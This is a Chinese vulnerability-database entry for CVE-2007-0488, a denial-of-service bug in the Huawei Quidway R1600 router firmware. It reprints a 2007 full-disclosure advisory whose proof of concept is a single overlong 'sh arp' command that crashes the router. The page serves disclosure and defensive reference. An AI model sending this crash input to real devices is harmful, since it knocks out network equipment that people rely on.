Quidway R1600路由器2500E-003固件拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191979 漏洞类型 未知
发布时间 2007-01-24 更新时间 2007-01-24
CVE编号 CVE-2007-0488 CNNVD-ID CNNVD-200701-422
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/86745
https://cxsecurity.com/issue/WLB-2007010091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-422
|漏洞详情
QuidwayR1600路由器上的华为万能发送指令平台1.432500E-003固件存在拒绝服务漏洞,远程攻击者可以借助一个过长的显示rap指令,引起拒绝服务攻击(设备崩溃)。
|漏洞EXP
Quidway Router Local DOS attack
By: Handrix <handrix_at_morx_org>
18 January 2007
MorX security research team
www.morx.org


Description:
The Quidway Router's firmware is vulnerable to a local denial of service
attack, there are a request to turn off the engine.
Simple poc realeased by :

Router>sh arp
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

After the Router crash, wait a while and type  "sh version" to verify this
bug:

Router>sh ver
 VRP (tm) software, Version 1.43 2500E-003
 Copyright (c) 1997-2002 HUAWEI TECH CO., LTD.
 Compiled 20:53:47, Nov  7 2002 ,
 Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds.

 Quidway R1600 with 1 68360 Processor
 16   Mbytes    DRAM
 4608 Kbytes    Flash Memory
 hardware version is 1.0


Vendor: Huawei
Vulnerable version:
Quidway R1600 (Versatile Routing Platform, version 1.43 2500E-003)
Maybe others.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070118/5130f8d9/attachment-0001.html
|受影响的产品
Huawei Versatile Routing Platform 1.43 2500E-003 Firmw
|参考资料

来源:XF
名称:quidway-arp-dos(31641)
链接:http://xforce.iss.net/xforce/xfdb/31641
来源:OSVDB
名称:40355
链接:http://osvdb.org/40355
来源:FULLDISC
名称:20070118TheQuidwayRouterlocalDOS
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2007-January/051856.html
来源:SREASON
名称:2176
链接:http://securityreason.com/securityalert/2176